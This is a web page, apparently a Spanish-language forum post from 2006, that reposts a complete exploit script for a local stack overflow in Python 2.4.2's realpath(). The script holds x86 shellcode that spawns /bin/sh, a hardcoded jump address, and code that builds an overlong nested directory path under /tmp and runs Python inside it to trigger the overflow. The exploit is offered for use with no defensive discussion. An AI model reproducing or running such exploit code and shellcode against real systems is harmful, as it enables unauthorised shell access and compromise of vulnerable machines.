Home

Python <= 2.4.2 realpath() Local Stack Overflow Exploit

Enviado por OeX el Ju, 23/03/2006 - 11:10.
#!/usr/bin/python

# gexp-python.py
#
# Python <= 2.4.2 realpath() Local Stack Overflow
# -----------------------------------------------
# Against VA Space Randomization.
#
# Copyright (c) 2006 Gotfault Security
#
# Bug found and developed by: dx/vaxen (Gotfault Security),
#       posidron (Tripbit Research Group).
# Enviroment:
#
# Kernel Version : 2.6.12.5-vs2.0
# GCC Version : 4.0.3
# Libc Version : 2.3.5
#
# Special greets goes to : posidron from tripbit.net
#    RFDSLabs, barros, izik,
#    Gotfault Security Community.
#
# Original Reference:
# http://gotfault.net/research/exploit/gexp-python.py

import os

# JMP *%ESP @ linux-gate.so.1
jmp    = "\x5f\xe7\xff\xff"

shell  = "\xeb\x1a\x5e\x31\xc0\x88\x46\x07\x8d\x1e"
shell += "\x89\x5e\x08\x89\x46\x0c\xb0\x0b\x89\xf3"
shell += "\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\xe8\xe1"
shell += "\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68"

os.chdir("/tmp")
base = os.getcwd()
dir = os.path.join("A"*250, "A"*250, "A"*250, "A"*250, "A"*42, jmp+shell)
os.makedirs(dir)
os.chdir(dir)

os.system('> vuln.py; python vuln.py')
os.remove("vuln.py")
os.chdir(base)
os.removedirs(dir)
  • 435 lecturas

Enviar un comentario nuevo

  • Saltos automáticos de líneas y de párrafos.
  • Allowed HTML tags: <a> <em> <strong> <cite> <code> <ul> <ol> <li> <dl> <dt> <dd> <img> <p> <br>
  • You may post code using <code>...</code> (generic) or <?php ... ?> (highlighted PHP) tags.

Más información sobre opciones de formato

CAPTCHA
This question is for testing whether you are a human visitor and to prevent automated spam submissions.
Image CAPTCHA
Copy the characters (respecting upper/lower case) from the image.